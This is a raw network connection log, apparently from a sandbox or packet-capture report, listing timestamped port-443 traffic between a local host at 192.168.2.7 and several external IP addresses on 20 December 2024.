                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.418785095 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.420157909 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.420269012 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.420448065 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.420475006 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.420488119 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.420675039 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.420706034 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.421813011 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.421895981 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.422039986 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.422065020 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.422075987 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.422184944 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.422219038 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.422219038 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.423444986 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.423511028 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.423589945 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.423609972 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.425201893 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.430958986 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.430975914 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.431000948 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.431026936 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.431041002 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.431097984 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.431118965 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.431159973 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.431174040 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.431211948 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.431262016 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.437472105 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.437510967 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.437557936 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.437577963 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637412071 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637427092 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637458086 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637485027 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637497902 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637518883 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637531996 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637538910 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637547970 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637553930 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637576103 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637593985 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637607098 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637651920 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637660027 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637677908 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637692928 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637703896 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637715101 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637737989 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637748003 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637785912 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637799978 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637809038 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637819052 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637871981 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637890100 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637902975 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637916088 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637953997 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637972116 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.638010025 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.638052940 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.638061047 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.638077974 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675271988 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675457001 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675491095 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675508976 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675524950 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675554037 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675586939 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675601006 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675614119 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675622940 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675642014 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675653934 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675662994 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675697088 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675723076 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675735950 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675755024 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675765991 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675847054 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675858021 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675942898 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675955057 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675970078 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675988913 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675998926 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.676017046 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.676048994 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.676057100 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.717068911 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.868359089 CET44349924116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.868433952 CET49924443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.868855000 CET49924443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.868869066 CET44349924116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.872036934 CET49924443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.872045994 CET44349924116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.655249119 CET49934443192.168.2.720.42.65.90
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.655287027 CET4434993420.42.65.90192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.655441999 CET49934443192.168.2.720.42.65.90
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.655704021 CET49934443192.168.2.720.42.65.90
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.655719042 CET4434993420.42.65.90192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.658211946 CET49935443192.168.2.720.42.65.90
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.658272028 CET4434993520.42.65.90192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.658480883 CET49935443192.168.2.720.42.65.90
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.658952951 CET49935443192.168.2.720.42.65.90
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.658965111 CET4434993520.42.65.90192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.750164032 CET44349924116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.750237942 CET44349924116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.750262022 CET49924443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:59.482949972 CET44349945116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:59.483064890 CET49945443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:59.483508110 CET49945443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:59.483519077 CET44349945116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:59.485358953 CET49945443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:59.485364914 CET44349945116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:59.485402107 CET49945443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:59.485408068 CET44349945116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:00.329569101 CET44349861162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:00.329659939 CET44349861162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:00.329757929 CET49861443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:00.330871105 CET44349862162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:00.331021070 CET44349862162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:00.331079006 CET49862443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:00.527847052 CET44349945116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:00.527923107 CET49945443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:00.527926922 CET44349945116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:00.527992010 CET49945443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:00.528774977 CET49945443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:00.528789997 CET44349945116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:01.020927906 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:01.021018982 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:01.021048069 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:01.021065950 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:01.021092892 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:01.021117926 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:01.021929026 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:01.021944046 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:01.034595013 CET44349864162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:01.034682035 CET44349864162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:01.034754038 CET49864443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:01.035018921 CET44349865162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:01.035183907 CET44349865162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:01.035238981 CET49865443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:01.112370968 CET49954443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:01.112418890 CET44349954116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:01.112484932 CET49954443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:01.112863064 CET49954443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:01.112878084 CET44349954116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:01.802566051 CET49862443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:01.802601099 CET44349862162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:01.802623034 CET49861443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:01.802649975 CET44349861162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:02.120466948 CET49961443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:02.120500088 CET44349961116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:02.120580912 CET49961443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:02.120817900 CET49961443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:02.120829105 CET44349961116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:02.513984919 CET44349954116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:02.514327049 CET49954443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:02.514713049 CET49954443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:02.514720917 CET44349954116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:02.516590118 CET49954443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:02.516601086 CET44349954116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:02.516716957 CET49954443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:02.516722918 CET44349954116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:03.526652098 CET44349961116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:03.527462959 CET49961443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:03.527839899 CET49961443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:03.527848005 CET44349961116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:03.529561996 CET49961443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:03.529568911 CET44349961116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:03.529598951 CET49961443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:03.529604912 CET44349961116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:03.559163094 CET44349954116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:03.559237003 CET44349954116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:03.559242010 CET49954443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:03.559295893 CET49954443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:03.560348034 CET49954443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:03.560363054 CET44349954116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:04.143196106 CET49970443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:04.143233061 CET44349970116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:04.143316031 CET49970443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:04.143565893 CET49970443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:04.143579960 CET44349970116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:04.564038992 CET44349961116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:04.564135075 CET44349961116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:04.564290047 CET49961443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:04.565252066 CET49961443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:04.565267086 CET44349961116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:05.170394897 CET49973443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:05.170439005 CET44349973116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:05.170507908 CET49973443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:16.071139097 CET50002443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:16.071171999 CET44350002116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:36.661130905 CET49864443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:36.661159039 CET44349864162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:36.661204100 CET49865443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:36.661277056 CET44349865162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:38.375474930 CET49915443192.168.2.7204.79.197.219
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:38.375478029 CET49916443192.168.2.7204.79.197.219
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:38.375493050 CET44349916204.79.197.219192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:38.375500917 CET44349915204.79.197.219192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.358808994 CET49881443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.358840942 CET49885443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.358854055 CET4434988123.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.358859062 CET4434988523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.358884096 CET49913443192.168.2.723.44.201.30
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.358903885 CET4434991323.44.201.30192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.358908892 CET49914443192.168.2.723.44.201.30
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.358953953 CET4434991423.44.201.30192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.678580046 CET50071443192.168.2.723.44.201.19
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.678620100 CET4435007123.44.201.19192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.678687096 CET50071443192.168.2.723.44.201.19
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.678898096 CET50071443192.168.2.723.44.201.19
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.678910971 CET4435007123.44.201.19192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:43.930938005 CET4435007123.44.201.19192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:43.931201935 CET50071443192.168.2.723.44.201.19
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:43.931211948 CET4435007123.44.201.19192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:43.932653904 CET4435007123.44.201.19192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:43.932718992 CET50071443192.168.2.723.44.201.19
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:43.932951927 CET50071443192.168.2.723.44.201.19
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:43.933032036 CET4435007123.44.201.19192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:43.985421896 CET50071443192.168.2.723.44.201.19
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:43.985430002 CET4435007123.44.201.19192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:44.032313108 CET50071443192.168.2.723.44.201.19
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:33:03.275413990 CET4435007123.44.201.19192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:33:03.275499105 CET4435007123.44.201.19192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:33:03.275546074 CET50071443192.168.2.723.44.201.19
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.094192028 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.096153975 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.238166094 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.288533926 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.300718069 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.332186937 CET61421443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.675870895 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.675890923 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.675904036 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.675916910 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.675945044 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.676316023 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.676415920 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.688561916 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.688577890 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.688594103 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.688659906 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.689244986 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.932337046 CET61421443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.990478039 CET44357769162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:46.018367052 CET57769443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:46.103614092 CET44361421162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:46.103663921 CET44361421162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:46.103677034 CET44361421162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:46.103744030 CET44361421162.159.61.3192.168.2.7
